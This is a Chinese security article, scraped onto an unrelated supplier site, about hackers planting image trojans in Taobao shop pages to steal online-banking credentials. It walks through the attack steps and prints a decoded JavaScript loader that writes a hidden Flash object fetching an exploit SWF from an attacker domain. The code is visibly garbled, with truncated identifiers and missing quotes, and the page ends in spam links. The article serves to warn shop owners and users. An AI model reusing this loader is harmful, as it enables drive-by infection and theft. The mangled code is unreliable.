咪唑啉衍生物厂家
免费服务热线

Free service

hotline

010-00000000
咪唑啉衍生物厂家
热门搜索:
技术资讯
当前位置:首页 > 技术资讯

警钟黑客在淘宝中挂马

发布时间:2020-03-10 11:10:22 阅读: 来源:咪唑啉衍生物厂家

中介交易 SEO诊断淘宝客 站长团购 云主机 技术大厅

淘宝网中国最大的购物网站,根据Alexa统计该居于全球网站访问量排名的第22位,每天有无数人访问该网站。围绕在这个不打烊的购物网站周围的全是那些使用网银的用户,在黑客眼中他们就是猎物。

最近就有黑客发现了淘宝网的挂马漏洞淘宝网允许用户将第三方网站的图片在淘宝店铺中显示。这个漏洞存在了很多年了,为何现在才被黑客利用呢?在2007年之前,还没有图片挂马这类方式,该漏洞就等于不是漏洞。

自从图片挂马在2008年盛行后,就有黑客研究了这个存在多年的漏洞,但还是没有造成大的影响,为何呢?是要利用该漏洞必须要获得网店的控制权吗?这不是关键缘由!要对图片进行加密处理,成功通过淘宝的过滤,这才是关键的,而且这种方法已被黑客成功掌握了。

目前,淘宝网已有店铺被挂马了(在截稿之前,我们已通知了淘宝网,得到了及时的处理)。这意味着甚么?如果挂马漏洞被广泛利用,所有访问淘宝的用户都可能中毒,一旦病毒进入电脑成功运行,就可能会盗走网银中的真金白银。

淘宝店铺被挂马

3月19日,我想帮女朋友在淘宝网上挑选一款手机,但是正在阅读店铺时,电脑中的防挂马软件突然连续报警,提示一个网址名为http://shop3387***.的淘宝店铺中含有歹意网站(图1)。

这个警报让我大吃一惊,由于根据我的经验,淘宝这样知名的电子商务网站安全防范措施一般比较多,遭到木马攻击的可能性相对小网站而言小很多。我发现该网站是一个皇冠级别的店铺,更加大了我清查挂马来源的兴趣。

因而赶忙在浏览器中点击右键选择查看源文件,查看该店铺页面的源代码(图2)。根据经验,我发现该店铺使用了一个GIF图片作为自己的店面图片,正是这个图片调用的木马致使了防挂马软件连续报警。

而根据这家店铺的统计数字显示(图3),这家店铺从开张到现在的流量几近接近200万,平均每天访问人数高达1万人,而一个个穿行在这间危险店铺期间的顾客也许其实不知道,此时木马病毒也许已悄悄的进入了他们不设防的电脑当中,开始盗取他们的数据、隐私、银行账号

问题出在哪?

近年来淘宝在网络安全方面投入颇多,特别是支付系统的安全性提升较高。在淘宝店铺方面,淘宝也不允许店主轻易将站内连接地址跳转到第三方网站,在防讹诈方面起到了安全防护作用。可采取了如此多的措施,为何阅读淘宝店铺还可能被挂马呢?黑客又是通过什么样的手段将图片木马挂到淘宝上的?

从淘宝建立之初,大概是出于勤俭服务器资源的斟酌,淘宝一直没有为店铺提供可供上传展现商品图片的选项,用户能够上传的只有略缩图图片。因此淘宝网允许用户将第三方网站的图片在淘宝店铺中显示。

允许用户用于商品展现和部份店铺装潢的图片来自第三方网站,就给黑客留下了无穷发挥的潜力。特别是2008年,图片挂马已成为一种主流挂马方式,在互联网中也可以找到众多的图片木马制作工具,而且操作过程简单,隐蔽性极高,也容易被用户忽视,此时如果用户的电脑没有及时打补丁和安装放病毒软件,则会在不知不觉中被木马入侵。

黑客是这样做到的

经过我分析,发现黑客在淘宝中使用的图片挂马方式,与《电脑报》介绍的反击网页木马系列中介绍的挂马手段有很多技术类似点,只不过进行了组合使用,这才绕过了淘宝的防护措施。

第一步:这名黑客将免杀处理的木马下载器上传到自己的网站,然后利用Adobe Flash Player SWF文件漏洞制作了一个溢出下载运行木马下载器的脚本网页木马,并通过Encode进行了网页代码加密(代码解密后如图4所示),并上传到自己指定的网站中。

代码解密后以下:

error=function(){return true;}

function init(){atus=;}load = init;

if(dexOf(play=)==-1){

var expires=new Date();

tTime(tTime()+24*60*60*1000);

okie=play=Yes;path=/;expires=+GMTString();

if(LowerCase().indexOf(msie)0)

{ite('object classid=clsid:d27cdb6e-ae6d-11cf-96b8-

444553540000codebase=

shockwave/cabs/flash/b#version=40190 width=0

height=0 align=middle');

ite('param name=allowScriptAccess value=always/');

ite('param name=movie value= 1111 .cn

/flash/f/');

ite('param name=quality value=high/');

ite('param name=bgcolor value=#ffffff/');

ite('embed src=****.cn/

flash/f/');

ite('/object');

}else

{ite(EMBED src= 1111 .cn/

flash/f width=0 height=0);}}

第二步:黑客使用了一种GIF图片挂马木马生成器,该生成器提供两种挂马方式,一种是直接允许输出的图片能运行黑客指定的EXE木马,另外一种则是利用跳转功能将网页跳转到黑客指定的挂马网页。

黑客选择了查杀困难更大的网页跳转式挂马,他首先运行GIF图片挂马生成器,在网页跳转式图片木马一项下方输入自己上传的溢出网页木马页面网络地址,然后点击地址下方的生成按钮(图5),快速的将GIF图片木马生成好。当这张图片上传到网上被用户阅读后,用户的浏览器会自动跳转到歹意挂马页面,运行挂马页面的病毒程序。

第三步:黑客通过技术手段盗取了淘宝某店铺的账号(由于我们看到是一个皇冠信誉级别的淘宝商铺,因此怀疑这名店铺的店主可能也是受害者),在盗取到店铺账号和密码后,黑客进入到淘宝店主的后台,通过淘宝的店铺设置功能,在该店铺中插入了自己指定的GIF网页木马地址,然后悄悄退出网店,就完成了全部的挂马操作。

此时任何阅读该页面的用户都会进入一个连环圈套,先履行网页木马,随后运行木马下载器,下载更多的木马到自己电脑中履行,构成一个恶性的死循环,终究致使自己的网银账号等信息被盗取。

防范方案

面对未知的挂马漏洞,普通用户只要做好自己的安全防范,就可以以不变应万变(具体方法参见上期F7《鸡尾酒法预防盗号》1文)。病毒进不了电脑,或进入电脑又存活不了,我们就到达了目的,根本不需要知道病毒利用的是什么漏洞。

对淘宝店主而言,可以选择一些Web反挂马程序例如锐甲,来监视自己的店铺,另外也需要常常查杀病毒。固然,淘宝也需要重新考了图片援用的问题,建立自己的图片服务器或与第三方签订图片保存协议,确保援用图片的安全性。

成都到宜昌物流价格

成都到浙江物流专线公司

成都到铜仁物流公司

成都到鸡西物流公司